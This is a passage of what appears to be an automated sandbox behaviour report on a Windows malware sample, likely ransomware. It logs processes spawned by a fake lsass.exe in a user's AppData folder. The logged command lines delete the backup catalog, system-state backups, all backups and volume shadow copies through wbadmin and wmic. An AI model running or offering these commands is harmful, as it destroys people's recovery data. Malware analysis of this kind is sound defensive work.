| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118092 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17290572573 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #13: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xba8 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BAC
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a480000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118217 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17303607529 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #14: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbc0 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BC4
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4ac20000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118342 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17316562518 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #15: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #15 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wbadmin delete systemstatebackup -keepversions:0 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:52, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd8 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BDC
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a260000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118467 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17330250351 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #16: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wbadmin delete backup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:00:54, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf0 |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BF4
|
Host Behavior
File (15)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Write | STD_ERROR_HANDLE | size = 98 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a1f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 118623 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17345665415 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 |
Process #17: cmd.exe
60
0
| Information | Value |
|---|---|
| ID | #17 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:00:57, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0xaf4 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
56C
|
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\Wbem\WMIC.exe | os_pid = 0x35c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4aa10000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
